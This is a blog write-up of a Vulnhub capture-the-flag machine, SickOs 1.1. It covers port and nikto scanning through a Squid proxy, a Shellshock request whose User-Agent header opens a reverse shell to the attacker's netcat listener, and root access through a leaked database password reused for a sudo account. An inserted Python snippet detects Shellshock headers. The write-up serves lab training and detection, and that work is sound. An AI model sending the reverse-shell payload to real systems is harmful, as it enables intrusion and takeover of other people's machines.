Mr_H4sh

Infosec, CTF and more

SickOs Solution

Hi guys,

In this post I’m going to show you how to solve the SickOS VM provided by D4rk.

Thanks to Vulnhub for keeping me busy with all these challenges, and thanks to everyone that hosts new challenges.

This challenge involves various hacking techniques.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will have an IP assigned automatically, so this is the situation:

192.168.56.102 <== attacker
192.168.56.105 <== victim

A port scan on the victim host gives this:

# nmap -sT -p- -v -n -Pn 192.168.56.105 -T5

Nmap scan report for 192.168.56.105
Host is up (0.00053s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

Apart from the open SSH port, I see a Squid proxy listening on port 3128, while the http-proxy port 8080 is reported closed.

I visit the URL http://192.168.56.105:80 through the proxy http://192.168.56.105:3128, and this is what I see:

bleah

Second step: VULNERABILITY SCAN

I start a vulnerability scan with nikto to find vulnerabilities on the website:

# nikto -useproxy http://192.168.56.105:3128 -h http://192.168.56.105:80

---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Proxy:              192.168.56.105:3128
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec  4 19:35:02 2015
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'nikto-added-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3233: /icons/README: Apache default file found.

I also spider the website with Burp Suite and find a robots.txt file with the following content:

User-agent: *
Disallow: /
Disallow: /wolfcms

The URL http://192.168.56.105/wolfcms gives this:

wolfcms

Third step: EXPLOITATION

The website is vulnerable to ShellShock, so I configure Burp Suite to send requests via the proxy http://192.168.56.105:3128, set up netcat to listen on local port 443, and then send a command that opens a reverse shell back to my machine:

On local machine:

nc -l -v -p 443

To the remote machine I send a GET request with the reverse shell command injected into the User-Agent header:

GET http://192.168.56.105/cgi-bin/status HTTP/1.1
Host: 192.168.56.105
User-Agent: () { :; };/bin/sh -i >& /dev/tcp/192.168.56.102/443 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

and the reverse shell connects back to the netcat listener on my local machine.
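From the defender's side, the request above has a recognisable shape: a CGI target and a header value that starts with a bash function definition. As an added example that is not part of the original post, this small Python checker parses a raw HTTP request and flags such headers, weighting the finding when the path is under /cgi-bin/; the sample requests are constructed for the example.

```python
import re
from typing import Dict, List

# Shellshock trigger shape (CVE-2014-6271, as flagged by nikto above): a header
# value beginning with a bash function definition "() { ... };" followed by
# trailing commands, which a vulnerable bash runs when the CGI handler exports
# the header as an environment variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")

# Constructed sample requests for this example, not captured from the VM.
CGI_PROBE = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 192.168.56.105\r\n"
    "User-Agent: () { :; }; /bin/echo probe\r\n"
    "Accept: */*\r\n\r\n"
)
NORMAL_REQUEST = (
    "GET /wolfcms/ HTTP/1.1\r\n"
    "Host: 192.168.56.105\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0\r\n\r\n"
)


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP request into method, request target and a header map."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line]
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def shellshock_findings(raw: str) -> List[str]:
    """Return one finding per header carrying a Shellshock-style payload, plus
    a severity note when the request targets a CGI path."""
    req = parse_request(raw)
    findings = [
        f"{name}: bash function definition in header value"
        for name, value in req["headers"].items()
        if SHELLSHOCK_RE.search(value)
    ]
    if findings and "/cgi-bin/" in req["target"]:
        findings.append("target is a CGI path; header reaches bash via the environment")
    return findings


if __name__ == "__main__":
    for label, sample in (("probe", CGI_PROBE), ("normal", NORMAL_REQUEST)):
        print(label, shellshock_findings(sample))
```

The same check can be run over proxy or web-server access logs that record the User-Agent, since the pattern lives in the header value rather than in the URL.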

I spawn a proper shell, look around, and find some tasty information in the /var/www/wolfcms/config.php file:

<?php 

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
?>

I try the password for the root user, but it does not work, so I have a look at the /etc/passwd file and find the user sickos.

I try to log in as sickos with the same password, john@123, and I'm in; sickos is also a sudoer.

So, time to get the flag.

www-data@SickOs:/var/www/wolfcms$ su - root  
su - root
Password: john@123

su: Authentication failure
www-data@SickOs:/var/www/wolfcms$ su - sickos
su - sickos
Password: john@123

sickos@SickOs:~$ ls -l
ls -l
total 0
sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123

root@SickOs:~# cd /root
cd /root
root@SickOs:~# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


root@SickOs:~# 

Conclusion

As usual, for any question or comment, please do not hesitate to leave a comment.

./A